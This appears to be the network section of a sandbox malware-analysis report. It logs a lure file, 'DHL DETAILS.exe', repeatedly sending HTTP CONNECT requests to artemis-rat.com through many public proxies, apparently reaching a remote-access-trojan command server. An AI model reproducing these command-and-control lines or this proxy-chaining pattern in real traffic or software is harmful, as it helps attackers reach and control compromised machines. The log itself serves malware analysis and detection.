Mar 9, 2024 13:14:12.751641035 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
112	192.168.2.5	50494	93.190.24.119	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.752095938 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
113	192.168.2.5	50293	52.73.224.54	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.757103920 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:12.974690914 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:12 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
114	192.168.2.5	50504	43.157.50.206	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.757337093 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
115	192.168.2.5	50505	43.157.50.206	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.761940956 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
116	192.168.2.5	50233	134.209.189.42	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.761941910 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.055193901 CET	327	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 (Ubuntu) Date: Sat, 09 Mar 2024 12:14:12 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
117	192.168.2.5	50511	43.157.50.206	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.763672113 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
118	192.168.2.5	50216	45.120.178.197	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.777585983 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
119	192.168.2.5	50524	43.157.50.206	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.782001019 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
120	192.168.2.5	50188	190.128.228.182	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.782056093 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.520600080 CET	1286	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:13 GMT Server: Apache/2.4.56 (Ubuntu) Set-Cookie: PHPSESSID=7rcj09ngv03o7t0609hc2sb31e; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Vary: Accept-Encoding Content-Length: 5101 Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 73 74 61 74 69 63 2f 73 72 63 2f 69 6d 67 2f 66 75 74 75 72 61 2e 70 6e 67 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 55 54 55 52 41 31 30 30 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 3c 21 2d 2d 20 46 6f 6e 74 66 61 63 65 73 20 43 53 53 2d 2d 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 73 73 2f 66 6f 6e 74 2d 66 61 63 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 6f 64 69 67 6f 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2d 35 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 3c 21 2d 2d 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 6f 64 69 67 6f 73 2f 6d 64 69 2d 66 6f 6e 74 2f 63 73 73 2f 6d 61 74 65 72 69 61 6c 2d 64 65 73 69 67 6e 2d 69 63 6f 6e 69 63 2d 66 6f 6e 74 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 2d 2d 3e 0d 0a 0d 0a 3c 21 2d 2d 20 42 6f 6f 74 73 74 72 61 70 20 43 53 53 2d 2d 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 73 74 61 74 69 63 2f 6c 69 62 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 0d 0a 3c 21 2d 2d 20 63 6f 64 69 67 6f 73 20 43 53 53 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 6f 64 69 67 6f 73 2f 61 6e 69 6d 73 69 74 69 6f 6e 2f 61 6e 69 6d 73 69 74 69 6f 6e 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 6f 64 69 67 6f 73 2f 70 65 72 66 65 63 74 2d 73 63 72 6f 6c 6c 62 61 72 2f 70 65 72 66 65 63 74 2d 73 63 72 6f 6c 6c 62 61 72 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 2d 2d 3e 0d 0a 0d 0a 3c 21 2d 2d Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <link rel="icon" href="static/src/img/futura.png"> <title>FUTURA100</title><link href="css/style.css" rel="stylesheet" media="all">... Fontfaces CSS--><link href="css/font-face.css" rel="stylesheet" media="all"><link href="codigos/font-awesome-5/css/fontawesome-all.min.css" rel="stylesheet" media="all">...<link href="codigos/mdi-font/css/material-design-iconic-font.min.css" rel="stylesheet" media="all">-->... Bootstrap CSS--><link href="static/lib/css/bootstrap/bootstrap.css" rel="stylesheet" media="all">... codigos CSS<link href="codigos/animsition/animsition.min.css" rel="stylesheet" media="all"><link href="codigos/perfect-scrollbar/perfect-scrollbar.css" rel="stylesheet" media="all">-->...
Mar 9, 2024 13:14:13.520694971 CET	1286	IN	Data Raw: 20 4d 61 69 6e 20 43 53 53 2d 2d 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 74 6f 75 72 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 Data Ascii: Main CSS--><link href="css/bootstrap-tour.min.css" rel="stylesheet" media="all"><link href="css/bootstrap-tour-standalone.css" rel="stylesheet" media="all"><link href="css/theme.css" rel="stylesheet" media="all"><link rel="stylesh
Mar 9, 2024 13:14:13.520808935 CET	1286	IN	Data Raw: 74 72 61 70 2d 74 6f 75 72 2d 30 2e 31 32 2e 30 2f 72 65 74 69 6e 61 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 Data Ascii: trap-tour-0.12.0/retina.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/xlsx/0.18.5/xlsx.full.min.js" integrity="sha512-r22gChDnGvBylk90+2e/ycr3RVrDi8DIOkIGNhJlKfuyQM4tIRAI062MaV8sfjQKYVGjOBaZBOA87z+IhZE9DA==" crossorigi
Mar 9, 2024 13:14:13.520999908 CET	369	OUT	Data Raw: 16 03 03 01 6c 01 00 01 68 03 03 65 ec 52 94 58 99 67 6f ce 45 58 ca 12 b8 7f e2 b8 c5 da 49 1b 18 74 ee cf 45 b7 b8 38 5e 52 0e 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c Data Ascii: lheRXgoEXItE8^R*,+0/$#('=<5/artemis-rat.com#+r8]sB':pnC.6r,`bgeZ'FHMe8ax
Mar 9, 2024 13:14:13.521101952 CET	1286	IN	Data Raw: 69 c3 b3 6e 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e Data Ascii: in</button> </div> </div> </div> </div> <div class="p-3 d-flex justify-content-center mt-5" style="background-color: rgba(0, 0, 0, -0.9);width: 400px; margin-left:auto;margin-r
Mar 9, 2024 13:14:13.521120071 CET	298	IN	Data Raw: 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 73 74 61 74 69 63 2f 73 72 63 2f 6a 73 2f 6d 61 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 73 74 61 74 69 63 2f 73 72 63 2f 6a 73 2f 6c 6f 67 69 Data Ascii: <script src="static/src/js/main.js"></script> <script src="static/src/js/login.js"></script> <script src="static/lib/js/bootstrap-tour-0.12.0/bootstrap-tour.min.js"></script> <script src="static/lib/js/bootstrap-tour-0.12.0/bootst
Mar 9, 2024 13:14:13.878740072 CET	494	IN	HTTP/1.1 400 Bad Request Date: Sat, 09 Mar 2024 12:14:13 GMT Server: Apache/2.4.56 (Ubuntu) Content-Length: 312 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 67 72 2e 66 75 74 75 72 61 31 30 30 2e 63 6f 6d 2e 70 79 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.56 (Ubuntu) Server at agr.futura100.com.py Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
121	192.168.2.5	50328	198.199.86.11	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.791537046 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.719146013 CET	28	IN	HTTP/1.1 400 Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
122	192.168.2.5	50214	103.23.100.1	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.793338060 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.504947901 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
123	192.168.2.5	50240	43.131.248.165	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.796854973 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
124	192.168.2.5	50565	45.144.30.232	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.799683094 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
125	192.168.2.5	50340	147.182.180.242	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.799982071 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
126	192.168.2.5	50567	45.144.30.232	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.800901890 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
127	192.168.2.5	50570	45.144.30.232	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.803358078 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
128	192.168.2.5	50572	45.144.30.232	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.804105043 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
129	192.168.2.5	50308	184.178.172.14	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.807326078 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
130	192.168.2.5	50273	119.196.168.183	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.811285019 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
131	192.168.2.5	50362	51.222.241.157	5717	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.813900948 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.348705053 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.036199093 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.473941088 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
132	192.168.2.5	50145	90.188.250.16	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.819938898 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
133	192.168.2.5	50243	31.148.207.153	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.825259924 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.159621000 CET	340	IN	HTTP/1.1 400 Bad Request Server: nginx/1.12.2 Date: Sat, 09 Mar 2024 12:14:12 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 173 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
134	192.168.2.5	50587	43.157.32.230	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.825261116 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
135	192.168.2.5	50250	43.155.130.182	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.826730013 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
136	192.168.2.5	50591	43.157.32.230	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.826730013 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
137	192.168.2.5	50592	43.157.32.230	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.828696966 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
138	192.168.2.5	50336	174.64.199.82	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.830874920 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

